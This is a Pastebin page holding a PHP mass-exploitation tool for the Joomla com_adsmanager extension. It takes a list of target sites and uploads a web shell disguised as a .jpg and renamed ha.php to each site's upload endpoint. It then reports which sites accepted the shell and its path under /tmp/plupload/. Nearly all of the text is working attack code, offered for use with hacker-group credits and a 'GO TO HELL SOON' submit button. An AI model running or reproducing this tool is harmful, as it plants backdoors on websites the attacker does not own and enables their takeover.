Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- visit my blog => www.annamcoder.tk
- CUT HERE --------------------------------------------------------------------------------------------------------------------------
- <center><br><br>
- <font color="lime" size="6">
- <b>Joomla com_adsmanager mass exploiter</b></font>
- <br><br>
- <form action="" method="POST">
- <textarea name="url" style="margin: 0px; width: 626px; height: 236px;">put your target without http://
- example :
- www.site.com
- www.site2.com
- www.site3.com
- www.site4.com
- www.site5.com
- </textarea><br>
- <br><br><input type="submit" class="btn btn-success" value="-=[ GO TO HELL SOON ]=-"/></form>
- <br><br>
- <?php
- #===============================================#
- #-------Joomla com_adsmanager Exploiter--------#
- #------------Coded By Synchronizer--------------#
- #-Gretz : Stupidc0de - IDCA - Indonesian Coder--#
- #===============================================#
- if(isset($_POST['url'])) {
- function StupidC0de($URL) {
- if(!function_exists('curl_init')) {
- die ("Curl PHP package not installed");
- }
- $inifile = "ha.jpg"; #Ganti shell mu dimari (shell extensi .jpg)
- $synchronizer = curl_init();
- curl_setopt($synchronizer, CURLOPT_POST, true);
- curl_setopt($synchronizer, CURLOPT_POSTFIELDS,
- array('file' => "@$inifile",'name' => "ha.php"));
- curl_setopt($synchronizer, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($synchronizer, CURLOPT_URL, $URL);
- curl_setopt($synchronizer, CURLOPT_HEADER, false);
- $response = curl_exec($synchronizer);
- return $response;
- }
- $textarea = htmlspecialchars(trim($_POST['url']));
- $j = explode("\r\n",$textarea);
- foreach($j as $sync){
- $n = StupidC0de($sync."/index.php?option=com_adsmanager&task=upload&tmpl=component");
- $b = str_replace('{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "', '<font color=lime><b>'.$sync.'/tmp/plupload/', $n);
- $bz = str_replace('"}', '</font><font color=yellow> - SUCCESS !</b></font>', $b);
- if(preg_match('/{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "/',$n)==1) {
- echo "<center>".$bz."</center><br>";
- } else {
- echo "<center>".$sync."<font color=red><b> - FAILED !</b></font></center><br>";
- }
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment